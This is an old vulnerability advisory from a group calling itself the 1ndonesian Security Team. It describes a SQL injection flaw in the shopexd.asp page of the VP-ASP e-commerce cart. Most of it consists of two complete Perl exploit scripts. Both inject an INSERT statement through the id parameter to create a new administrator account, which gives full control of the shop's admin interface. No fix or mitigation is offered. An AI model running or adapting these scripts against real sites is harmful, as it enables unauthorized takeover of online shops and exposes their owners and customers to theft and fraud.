VPASP.txt

`$Id: aresu-adv.6,v1 04/07/2003 aresu Exp $  
  
1ndonesian Security Team (1st)  
AresU Advisory #6 VPASP SQL Injection  
04/07/2003  
  
  
  
  
VPASP SQL Injection Vulnerability & Exploit CODE  
_______________________________________________________________________________  
  
  
Advisory Name: VPASP SQL Injection Vulnerability  
Release Date: 05/07/2003  
Application: 5  
Platform: Win32/MSSQL  
Severity: High  
BUG Type: SQL Injection  
Discover by: AresU <[email protected]> & TioEuy <[email protected]>  
Author: Bosen <[email protected]>  
Vendor Status: See below.  
Vendor URL: http://www.vpasp.com/  
Reference: http://bosen.net/releases/  
  
Overview:  
VP-ASP is now in use in over 70 countries and has every major feature  
you would expect from an e-commerce solution. VP-ASP combines ease of use and powerful features with unlimited customization.  
more nice reading at http://www.vpasp.com itself.  
  
Details:  
Looking at vpasp source code, we found nice SQL Injection vuln. which is lies on shopexd.asp. Exploiting is not hard to do. Insert new user with admin priviledge can be done in a sec. Which is would couse full control to web based admin interface.  
  
Exploits/POC:  
by Bosen  
--------  
#!/usr/bin/perl -w  
$pamer = "  
1ndonesian Security Team (1st)  
==============================  
tio-fux.pl, vpasp SQL Injection Proof of Concept  
Exploit by : Bosen & TioEuy  
Discover by : TioEuy, AresU  
Greetz to : AresU, syzwz (ta for da ipod), TioEuy, sakitjiwa,  
muthafuka all #hackers\@centrin.net.id/austnet.org  
http://bosen.net/releases/  
"; # shut up ! we're the best in our country :)  
  
use LWP::UserAgent; # LWP Mode sorry im lazy :)  
use HTTP::Request;  
use HTTP::Response;  
$| = 1;  
print $pamer;  
if ($#ARGV<3){  
print "\n Usage: perl tio-fux.pl <uri> <prod-id> <user> <password>  
\n\n";  
exit;  
}  
my $biji =  
"1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29";  
$tio = "$ARGV[0]/shopexd.asp?id=$ARGV[1]";  
$tio .= ";insert into tbluser  
(\"fldusername\",\"fldpassword\",\"fldaccess\") ";  
$tio .= "values ('$ARGV[2]','$ARGV[3]','$biji')--";  
  
my $bosen = LWP::UserAgent->new();  
my $gembel = HTTP::Request->new(GET => $tio);  
my $dodol = $bosen->request($gembel);  
if ($dodol->is_error()) {  
printf " %s\n", $dodol->status_line;  
} else {  
print "Tuing !\n";  
}  
print "\n680165\n";  
--END--  
  
by Aresu  
--------  
#!/usr/bin/perl  
# PRIVATE***PRIVATE***PRIVATE***PRIVATE***PRIVATE***PRIVATE***PRIVATE  
# 1ndonesian Security Team (1st)  
# ==============================  
# VP-ASP Shopping Cart - Exploit  
# Discover by : TioEuy & AresU;  
# Greetz to: syzwz (ta for da ipod), Bosen, sakitjiwa, muthafuka all  
# [email protected]/austnet.org, #[email protected]  
# http://bosen.net/releases/  
use Socket;  
  
$dodolbasik = "tioeuy.pl, VPASP exploit by TioEuy&AresU ";  
$aksesnya  
="1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29";  
$pieldnya = '"fldusername","fldpassword","fldaccess"';  
  
if ($#ARGV<4)  
{  
print "\n$dodolbasik";  
print "\n\n Usage: perl tioeuy.pl <server> <full path> <id> <user>  
<password> \n\n";  
exit;  
}  
$kupret="$ARGV[1]shopexd.asp?id=$ARGV[2];insert into tbluser  
($pieldnya)  
values ('$ARGV[3]','$ARGV[4]','$aksesnya')--";  
$kupret=~s/\ /%20/g;  
$kupret="GET $kupret HTTP/1.0\r\nHost: $ARGV[0]\r\n\r\n";  
print $kupret;  
  
$port=80;  
$host=$ARGV[0];  
$target = inet_aton($host);  
@hasil=sendraw($kupret);  
print $gembel;  
print @hasil;  
  
# ------------- Sendraw - thanx RFP [email protected]  
sub sendraw { # this saves the whole transaction anyway  
my ($pstr)=@_;  
  
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||  
die("Socket problems\n");  
  
if(connect(S,pack "SnA4x8",2,$port,$target)){  
my @in;  
select(S); $|=1; print $pstr;  
while(<S>){ push @in, $_;}  
select(STDOUT); close(S); return @in;  
}  
}  
--END--  
  
Vendor Response:  
Contacted. No response.  
  
Recommendation:  
No recommendation for this.  
  
1ndonesian Security Team (1st) Advisory:  
http://bosen.net/releases/  
  
About 1ndonesian Security Team:  
1ndonesian Security Team, research and develop intelligent, advanced  
application security assessment. Based in Indonesia, 1ndonesian Security Team offers best of breed security consulting services, specialising in application, host and network security assessments.  
  
1st provides security information and patches for use by the entire 1st  
community.  
  
This information is provided freely to all interested parties and may be  
redistributed provided that it is not altered in any way, 1st is appropriately  
credited and the document retains.  
  
Greetz to:  
Bosen, sakitjiwa, muthafuka, alphacentury, Gembul, syzwz, Heltz, TomIngShUu, riico, w4n  
All 1ndonesian Security Team - #[email protected]/centrin.net.id  
  
****************************************************************************  
this advisory is for educational purpose only, the author is not   
responsible for anything happened with the use of this script *cupz*  
****************************************************************************  
  
  
  
AresU <[email protected]>  
======================  
Original document can be fount at http://bosen.net/releases/?id=41  
`